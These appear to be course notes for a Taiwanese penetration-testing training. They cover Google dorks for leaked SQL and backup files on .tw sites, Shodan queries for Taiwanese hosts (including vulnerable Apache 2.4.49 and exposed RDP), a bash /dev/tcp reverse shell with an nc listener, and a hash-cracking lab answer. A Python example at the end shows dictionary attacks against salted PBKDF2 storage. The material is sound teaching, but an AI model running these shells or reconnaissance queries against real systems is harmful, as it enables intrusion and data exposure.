# Tainan City Cybersecurity Offense and Defense Talent Training Series - Analysis of System Penetration Testing Attack Techniques

[TOC]

:::info
Please read first:
- Burp Suite: https://hackercat.org/burp-suite-tutorial/web-pentesting-burp-suite-total-tutorial
- Kali Linux installation: https://ithelp.ithome.com.tw/articles/10298620
:::

<!--https://docs.google.com/forms/d/127B0EDTOSvBB1RvHZnRu-khqqxsy14BiBxyxydjkD_o/edit-->

# Lab

## [Lab] Google Hacking

- Find which websites under Taiwan's top-level domain (.tw) have leaked files with the `.sql` extension.

:::spoiler Reference answer
`site:".tw" filetype:sql`
:::

- Find which websites under Taiwan's top-level domain (.tw) expose a web directory index of backup files.

:::spoiler Reference answer
`site:".tw" intitle:"index of" intext:"backup"`
:::

- Think about how Google hacking could be used to find the mail users of a specific domain.

### Google Hacking Database

- https://www.exploit-db.com/google-hacking-database
- https://github.com/readloud/Google-Hacking-Database

## [Lab] Shodan practice

- Find all devices in `Tainan City`

:::spoiler Reference answer
`city:Tainan`
:::

- Find open `port 22` where the country is Taiwan

:::spoiler Reference answer
`country:TW port:22`
:::

- Find hosts where the country is Taiwan and the exposed `apache httpd` version is `2.4.49`

:::spoiler Reference answer
`country:TW product:"Apache httpd" version:"2.4.49"`
:::

- Find hosts where the country is Taiwan, the city is Tainan, port 3389 is open, and a screenshot is available

:::spoiler Reference answer
`country:TW city:tainan has_screenshot:true port:"3389"`
:::

## [Lab] Dissecting a PDF

- LibreOffice
  - https://www.libreoffice.org/download/download-libreoffice/
- Obtain the password of `admin3490`
  - File: https://drive.google.com/file/d/1g4TaRILhtch9bzdWVvQaiN03Jd7K62H5/view?usp=drive_link

:::spoiler Reference answer
1. Open LibreOffice and import the file
2. Remove the black box
:::

## [Lab] Reverse shell

- Try to run a reverse shell on the victim machine that connects back to the Kali machine
  - Scenario: Kali is the attacker machine and the other Linux host is the victim, so we want the victim's shell to connect back to Kali so that the victim can be controlled from Kali.

:::spoiler Reference answer
1. On Kali, run `ifconfig` or `ip addr` to confirm its IP
2. Start the listener, then the connect-back:
   - Kali: `nc -lvnp {PORT}`
   - Victim machine: `bash -c 'bash -i >& /dev/tcp/{Kali_IP}/{PORT} 0>&1'`
:::

## [Lab] Hash cracking

- Wordlist: https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
- Try to crack this hash: `0756502edba9f182d85fcfccaf2807c682a3d27d`

:::spoiler Reference answer
1. Identify the hash type: `hashid -j 0756502edba9f182d85fcfccaf2807c682a3d27d`
2. ![image](https://hackmd.io/_uploads/ryVv2sxtC.png)
3. `vim hash.txt`
   3.1. `i`
   3.2. paste
   3.3. `esc` `:` `wq` `!`
   3.4. enter
4.
![image](https://hackmd.io/_uploads/HyBJTsgFC.png)
   `Ans: root1234`
:::

## [Lab] sqlmap

- https://tryhackme.com/r/room/sqlmap

:::spoiler Reference answer
https://medium.com/@prangonbd/sqlmap-tryhackme-d28142b64029
:::

## [Lab] Final lab

- https://tryhackme.com/r/room/easyctf

:::spoiler Reference answer
https://medium.com/@skylarphenis/tryhackme-simple-ctf-walk-through-e8bb8c8671a9
:::

## Open Redirection

- `https://facebook.com/l.php?u=http://example.com`

## Other labs (try them if you are interested)

- All labs: https://tryhackme.com/r/hacktivities
- Nmap: https://tryhackme.com/r/room/furthernmap
- SQL injection: https://tryhackme.com/r/room/sqlinjectionlm
- SSRF: https://tryhackme.com/r/room/ssrfhr
- Broken Access Control: https://tryhackme.com/r/room/owaspbrokenaccesscontrol
- OWASP Top 10 - 2021: https://tryhackme.com/r/room/owasptop102021

<!--
## [Lab] LFI/Path traversal
- https://tryhackme.com/r/room/filepathtraversal

## [Lab] AD
- https://github.com/safebuffer/vulnerable-AD
-->

# Tool

## ip/domain

- ipinfo: https://ipinfo.io/

## Wappalyzer browser extension

- https://chromewebstore.google.com/detail/wappalyzer-technology-pro/gppongmhjkpfnbhagpmjfkannfbllamg?hl=zh-TW&pli=1

## Exploit DB

- https://www.exploit-db.com/

## web check

- https://web-check.xyz/

## [web information leakage](https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/01-Information_Gathering/05-Review_Webpage_Content_for_Information_Leakage)

- jsfinder: https://github.com/mickeystone/JSFinderPlus
- keyhacks: https://github.com/streaak/keyhacks
- Google Maps API Scanner: https://github.com/ozguralp/gmapsapiscanner/
- waybackurl: https://github.com/tomnomnom/waybackurls

## shodan

- shodan: https://www.shodan.io
- filter: https://www.shodan.io/search/filters

## fofa & zoomeye

- fofa: https://fofa.info/
- zoomeye: https://www.zoomeye.hk/

## Subdomain

- crt.sh: https://crt.sh/
- dnsdumpster: https://dnsdumpster.com/
- virustotal: https://www.virustotal.com/gui/

## wpscan

- https://wpscan.com/

## amass

- https://github.com/owasp-amass/amass/

```
In Kali (Root):
- apt-get update
- apt-get install amass
```

## Reverse shell generator

- https://www.revshells.com/

## mimikatz (installed by default in Kali)

- https://github.com/ParrotSec/mimikatz

# Further reading

## Penetration testing learning resources

- 飛飛's IT Ironman Challenge articles: https://ithelp.ithome.com.tw/users/20108446/articles
- Cymetrics Tech Blog: https://tech-blog.cymetrics.io/
- HackTricks: https://book.hacktricks.xyz/
- Red Team Notes: https://www.ired.team/
- 3gstudent: https://3gstudent.github.io/

---

## Other supplementary articles

- Security certification roadmap: https://pauljerimy.com/security-certification-roadmap/
- OWASP testing guide: https://owasp.org/www-project-web-security-testing-guide/latest/
- PHP bypass of `disable_functions`: https://cloud.tencent.com/developer/article/2069788
- File transfer techniques: https://hackercat.org/pentesting/how-to-transfer-file-from-linux-to-windows
- SSH tunneling: https://erev0s.com/blog/ssh-local-remote-and-dynamic-port-forwarding-explain-it-i-am-five/
- Introduction to post-exploitation: https://hackmd.io/@jonafk555/ByAj15D-p
- AD domain penetration testing: https://hackmd.io/@jonafk555/H1SIBUB3C
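Returning to the hash-cracking lab: the Python below is an added worked example, not part of the course materials. It reproduces what `hashid` (identification by digest length) and a wordlist run do against an unsalted fast hash, using a small constructed wordlist and a constructed SHA-1 target in place of rockyou.txt and the lab's hash, and contrasts that with a salted PBKDF2 store where the same one-pass lookup no longer applies.

```python
import hashlib
import hmac
import os
from typing import Optional

# Hex-digest lengths of common unsalted hashes. A length-only guess, as hashid
# makes, lists every algorithm sharing that length (ntlm is not in hashlib and
# is kept only so the identification step shows the ambiguity).
HEX_LENGTH_CANDIDATES = {32: ["md5", "ntlm"], 40: ["sha1"], 64: ["sha256"], 128: ["sha512"]}

def identify_by_length(digest_hex: str) -> list[str]:
    """Return plausible algorithm names for a hex digest, judged only by its length."""
    digest_hex = digest_hex.strip().lower()
    if not digest_hex or any(c not in "0123456789abcdef" for c in digest_hex):
        return []
    return HEX_LENGTH_CANDIDATES.get(len(digest_hex), [])

def dictionary_lookup(digest_hex: str, wordlist: list[str]) -> Optional[str]:
    """Hash every candidate word with each admissible hashlib algorithm and compare.
    An unsalted fast hash falls to this in a single pass over the wordlist."""
    target = digest_hex.strip().lower()
    for algo in identify_by_length(target):
        if algo not in hashlib.algorithms_available:
            continue
        for word in wordlist:
            if hashlib.new(algo, word.encode()).hexdigest() == target:
                return word
    return None

def pbkdf2_store(password: str, salt: Optional[bytes] = None, iterations: int = 600_000) -> str:
    """Salted, slow storage format: a wordlist has to be re-hashed per user and per salt."""
    salt = salt if salt is not None else os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"

def pbkdf2_verify(stored: str, password: str) -> bool:
    """Constant-time check of a password against a pbkdf2_store() string."""
    _, iterations, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)

# Constructed mini wordlist standing in for rockyou.txt, and a constructed
# SHA-1 target (not the lab's hash) built from one of its entries.
WORDLIST = ["123456", "password", "admin", "root1234", "letmein"]
SAMPLE_SHA1 = hashlib.sha1(b"admin").hexdigest()

if __name__ == "__main__":
    print(identify_by_length(SAMPLE_SHA1))           # ['sha1']
    print(dictionary_lookup(SAMPLE_SHA1, WORDLIST))   # admin
    stored = pbkdf2_store("admin")
    print(dictionary_lookup(stored, WORDLIST))        # None: not a bare hex digest
    print(pbkdf2_verify(stored, "admin"))             # True
```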